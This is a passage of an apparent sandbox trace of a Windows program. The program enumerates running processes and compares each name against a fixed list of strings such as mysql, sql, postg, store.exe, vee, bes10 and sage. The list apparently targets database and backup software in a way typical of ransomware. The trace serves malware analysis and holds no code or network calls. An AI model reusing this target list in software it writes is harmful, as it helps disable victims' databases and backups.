nChar=5) returned 1 [0059.722] StrCmpNW (lpStr1="smss.", lpStr2="black", nChar=5) returned 1 [0059.722] StrCmpNW (lpStr1="sms", lpStr2="sql", nChar=3) returned -1 [0059.722] StrCmpNW (lpStr1="smss.exe", lpStr2="store.exe", nChar=9) returned -1 [0059.722] StrCmpNW (lpStr1="sms", lpStr2="vee", nChar=3) returned -1 [0059.722] StrCmpNW (lpStr1="smss.", lpStr2="postg", nChar=5) returned 1 [0059.722] StrCmpNW (lpStr1="smss", lpStr2="sage", nChar=4) returned 1 [0059.722] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.122] StrCmpNW (lpStr1="csrss", lpStr2="mysql", nChar=5) returned -1 [0060.122] StrCmpNW (lpStr1="csr", lpStr2="IBM", nChar=3) returned -1 [0060.122] StrCmpNW (lpStr1="csrss", lpStr2="bes10", nChar=5) returned 1 [0060.122] StrCmpNW (lpStr1="csrss", lpStr2="black", nChar=5) returned 1 [0060.122] StrCmpNW (lpStr1="csr", lpStr2="sql", nChar=3) returned -1 [0060.122] StrCmpNW (lpStr1="csrss.exe", lpStr2="store.exe", nChar=9) returned -1 [0060.122] StrCmpNW (lpStr1="csr", lpStr2="vee", nChar=3) returned -1 [0060.122] StrCmpNW (lpStr1="csrss", lpStr2="postg", nChar=5) returned -1 [0060.122] StrCmpNW (lpStr1="csrs", lpStr2="sage", nChar=4) returned -1 [0060.122] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0060.122] StrCmpNW (lpStr1="winin", lpStr2="mysql", nChar=5) returned 1 [0060.122] StrCmpNW (lpStr1="win", lpStr2="IBM", nChar=3) returned 1 [0060.122] StrCmpNW (lpStr1="winin", lpStr2="bes10", nChar=5) returned 1 [0060.122] StrCmpNW (lpStr1="winin", lpStr2="black", nChar=5) returned 1 [0060.122] StrCmpNW (lpStr1="win", lpStr2="sql", nChar=3) returned 1 [0060.122] StrCmpNW (lpStr1="wininit.e", lpStr2="store.exe", nChar=9) returned 1 [0060.122] StrCmpNW (lpStr1="win", lpStr2="vee", nChar=3) returned 1 [0060.122] StrCmpNW (lpStr1="winin", lpStr2="postg", nChar=5) returned 1 [0060.122] StrCmpNW (lpStr1="wini", lpStr2="sage", nChar=4) returned 1 [0060.123] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.123] StrCmpNW (lpStr1="csrss", lpStr2="mysql", nChar=5) returned -1 [0060.123] StrCmpNW (lpStr1="csr", lpStr2="IBM", nChar=3) returned -1 [0060.123] StrCmpNW (lpStr1="csrss", lpStr2="bes10", nChar=5) returned 1 [0060.123] StrCmpNW (lpStr1="csrss", lpStr2="black", nChar=5) returned 1 [0060.123] StrCmpNW (lpStr1="csr", lpStr2="sql", nChar=3) returned -1 [0060.123] StrCmpNW (lpStr1="csrss.exe", lpStr2="store.exe", nChar=9) returned -1 [0060.123] StrCmpNW (lpStr1="csr", lpStr2="vee", nChar=3) returned -1 [0060.123] StrCmpNW (lpStr1="csrss", lpStr2="postg", nChar=5) returned -1 [0060.123] StrCmpNW (lpStr1="csrs", lpStr2="sage", nChar=4) returned -1 [0060.123] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0060.124] StrCmpNW (lpStr1="winlo", lpStr2="mysql", nChar=5) returned 1 [0060.124] StrCmpNW (lpStr1="win", lpStr2="IBM", nChar=3) returned 1 [0060.124] StrCmpNW (lpStr1="winlo", lpStr2="bes10", nChar=5) returned 1 [0060.124] StrCmpNW (lpStr1="winlo", lpStr2="black", nChar=5) returned 1 [0060.124] StrCmpNW (lpStr1="win", lpStr2="sql", nChar=3) returned 1 [0060.124] StrCmpNW (lpStr1="winlogon.", lpStr2="store.exe", nChar=9) returned 1 [0060.124] StrCmpNW (lpStr1="win", lpStr2="vee", nChar=3) returned 1 [0060.124] StrCmpNW (lpStr1="winlo", lpStr2="postg", nChar=5) returned 1 [0060.124] StrCmpNW (lpStr1="winl", lpStr2="sage", nChar=4) returned 1 [0060.124] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0060.124] StrCmpNW (lpStr1="servi", lpStr2="mysql", nChar=5) returned 1 [0060.124] StrCmpNW (lpStr1="ser", lpStr2="IBM", nChar=3) returned 1 [0060.124] StrCmpNW (lpStr1="servi", lpStr2="bes10", nChar=5) returned 1 [0060.125] StrCmpNW (lpStr1="servi", lpStr2="black", nChar=5) returned 1 [0060.125] StrCmpNW (lpStr1="ser", lpStr2="sql", nChar=3) returned -1 [0060.125] StrCmpNW (lpStr1="services.", lpStr2="store.exe", nChar=9) returned -1 [0060.125] StrCmpNW (lpStr1="ser", lpStr2="vee", nChar=3) returned -1 [0060.125] StrCmpNW (lpStr1="servi", lpStr2="postg", nChar=5) returned 1 [0060.125] StrCmpNW (lpStr1="serv", lpStr2="sage", nChar=4) returned 1 [0060.125] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0060.125] StrCmpNW (lpStr1="lsass", lpStr2="mysql", nChar=5) returned -1 [0060.125] StrCmpNW (lpStr1="lsa", lpStr2="IBM", nChar=3) returned 1 [0060.125] StrCmpNW (lpStr1="lsass", lpStr2="bes10", nChar=5) returned 1 [0060.125] StrCmpNW (lpStr1="lsass", lpStr2="black", nChar=5) returned 1 [0060.125] StrCmpNW (lpStr1="lsa", lpStr2="sql", nChar=3) returned -1 [0060.125] StrCmpNW (lpStr1="lsass.exe", lpStr2="store.exe", nChar=9) returned -1 [0060.125] StrCmpNW (lpStr1="lsa", lpStr2="vee", nChar=3) returned -1 [0060.125] StrCmpNW (lpStr1="lsass", lpStr2="postg", nChar=5) returned -1 [0060.125] StrCmpNW (lpStr1="lsas", lpStr2="sage", nChar=4) returned -1 [0060.125] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.126] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0060.126] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0060.126] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0060.126] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0060.126] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0060.126] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0060.126] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0060.126] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0060.126] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0060.126] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0060.127] StrCmpNW (lpStr1="fontd", lpStr2="mysql", nChar=5) returned -1 [0060.127] StrCmpNW (lpStr1="fon", lpStr2="IBM", nChar=3) returned -1 [0060.127] StrCmpNW (lpStr1="fontd", lpStr2="bes10", nChar=5) returned 1 [0060.127] StrCmpNW (lpStr1="fontd", lpStr2="black", nChar=5) returned 1 [0060.127] StrCmpNW (lpStr1="fon", lpStr2="sql", nChar=3) returned -1 [0060.127] StrCmpNW (lpStr1="fontdrvho", lpStr2="store.exe", nChar=9) returned -1 [0060.127] StrCmpNW (lpStr1="fon", lpStr2="vee", nChar=3) returned -1 [0060.127] StrCmpNW (lpStr1="fontd", lpStr2="postg", nChar=5) returned -1 [0060.127] StrCmpNW (lpStr1="font", lpStr2="sage", nChar=4) returned -1 [0060.127] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0060.128] StrCmpNW (lpStr1="fontd", lpStr2="mysql", nChar=5) returned -1 [0060.128] StrCmpNW (lpStr1="fon", lpStr2="IBM", nChar=3) returned -1 [0060.128] StrCmpNW (lpStr1="fontd", lpStr2="bes10", nChar=5) returned 1 [0060.128] StrCmpNW (lpStr1="fontd", lpStr2="black", nChar=5) returned 1 [0060.128] StrCmpNW (lpStr1="fon", lpStr2="sql", nChar=3) returned -1 [0060.128] StrCmpNW (lpStr1="fontdrvho", lpStr2="store.exe", nChar=9) returned -1 [0060.128] StrCmpNW (lpStr1="fon", lpStr2="vee", nChar=3) returned -1 [0060.128] StrCmpNW (lpStr1="fontd", lpStr2="postg", nChar=5) returned -1 [0060.128] StrCmpNW (lpStr1="font", lpStr2="sage", nChar=4) returned -1 [0060.128] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.128] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0060.128] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0060.129] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0060.129] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0060.129] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0060.129] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0060.129] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0060.129] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0060.129] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0060.129] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0060.129] StrCmpNW (lpStr1="dwm.e", lpStr2="mysql", nChar=5) returned -1 [0060.129] StrCmpNW (lpStr1="dwm", lpStr2="IBM", nChar=3) returned -1 [0060.129] StrCmpNW (lpStr1="dwm.e", lpStr2="bes10", nChar=5) returned 1 [0060.129] StrCmpNW (lpStr1="dwm.e", lpStr2="black", nChar=5) returned 1 [0060.129] StrCmpNW (lpStr1="dwm", lpStr2="sql", nChar=3) returned -1 [0060.129] StrCmpNW (lpStr1="dwm.exe", lpStr2="store.exe", nChar=9) returned -1 [0060.129] StrCmpNW (lpStr1="dwm", lpStr2="vee", nChar=3) returned -1 [0060.129] StrCmpNW (lpStr1="dwm.e", lpStr2="postg", nChar=5) returned -1 [0060.129] StrCmpNW (lpStr1="dwm.", lpStr2="sage", nChar=4) returned -1 [0060.129] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.130] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0060.130] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0060.130] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0060.130] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0060.130] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0060.130] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0060.130] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0060.130] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0060.130] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0060.130] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.131] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0060.131] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0060.131] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0060.131] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0060.131] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0060.131] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0060.131] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0060.131] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0060.131] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0060.131] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.131] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0060.131] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0060.131] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0060.131] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0060.131] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0060.131] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0060.131] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0060.131] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0060.131] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0060.132] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.132] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0060.132] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0060.132] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0060.132] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0060.132] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0060.132] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0060.132] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0060.132] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0060.132] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0060.132] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.215] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0060.215] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0060.215] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0060.215] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0060.216] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0060.216] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0060.216] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0060.216] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0060.216] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0060.216] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.216] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0060.216] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0060.216] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0060.216] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0060.216] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0060.216] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0060.216] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0060.216] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0060.216] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0060.216] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.217] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0060.217] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0060.217] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0060.217] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0060.217] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0060.217] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0060.217] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0060.217] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0060.217] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0060.217] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.218] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0060.218] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0060.218] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0060.218] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0060.218] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0060.218] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0060.218] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0060.218] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0060.218] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0060.218] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.218] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0060.218] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0060.218] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0060.218] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0060.218] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0060.218] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0060.218] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0060.218] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0060.219] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0060.219] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0060.219] StrCmpNW (lpStr1="spool", lpStr2="mysql", nChar=5) returned 1 [0060.219] StrCmpNW (lpStr1="spo", lpStr2="IBM", nChar=3) returned 1 [0060.219] StrCmpNW (lpStr1="spool", lpStr2="bes10", nChar=5) returned 1 [0060.219] StrCmpNW (lpStr1="spool", lpStr2="black", nChar=5) returned 1 [0060.219] StrCmpNW (lpStr1="spo", lpStr2="sql", nChar=3) returned -1 [0060.219] StrCmpNW (lpStr1="spoolsv.e", lpStr2="store.exe", nChar=9) returned -1 [0060.219] StrCmpNW (lpStr1="spo", lpStr2="vee", nChar=3) returned -1 [0060.219] StrCmpNW (lpStr1="spool", lpStr2="postg", nChar=5) returned 1 [0060.219] StrCmpNW (lpStr1="spoo", lpStr2="sage", nChar=4) returned 1 [0060.219] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.220] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0060.220] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0060.220] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0060.220] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0060.220] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0060.220] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0060.220] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0060.220] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0060.220] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0060.220] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.220] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0060.220] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0060.220] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0060.221] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0060.221] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0060.221] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0060.221] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0060.221] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0060.221] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0060.221] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0060.221] StrCmpNW (lpStr1="audio", lpStr2="mysql", nChar=5) returned -1 [0060.221] StrCmpNW (lpStr1="aud", lpStr2="IBM", nChar=3) returned -1 [0060.221] StrCmpNW (lpStr1="audio", lpStr2="bes10", nChar=5) returned -1 [0060.221] StrCmpNW (lpStr1="audio", lpStr2="black", nChar=5) returned -1 [0060.222] StrCmpNW (lpStr1="aud", lpStr2="sql", nChar=3) returned -1 [0060.222] StrCmpNW (lpStr1="audiodg.e", lpStr2="store.exe", nChar=9) returned -1 [0060.222] StrCmpNW (lpStr1="aud", lpStr2="vee", nChar=3) returned -1 [0060.222] StrCmpNW (lpStr1="audio", lpStr2="postg", nChar=5) returned -1 [0060.222] StrCmpNW (lpStr1="audi", lpStr2="sage", nChar=4) returned -1 [0060.222] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0060.222] StrCmpNW (lpStr1="sihos", lpStr2="mysql", nChar=5) returned 1 [0060.222] StrCmpNW (lpStr1="sih", lpStr2="IBM", nChar=3) returned 1 [0060.222] StrCmpNW (lpStr1="sihos", lpStr2="bes10", nChar=5) returned 1 [0060.222] StrCmpNW (lpStr1="sihos", lpStr2="black", nChar=5) returned 1 [0060.222] StrCmpNW (lpStr1="sih", lpStr2="sql", nChar=3) returned -1 [0060.222] StrCmpNW (lpStr1="sihost.ex", lpStr2="store.exe", nChar=9) returned -1 [0060.223] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.223] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0060.224] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, 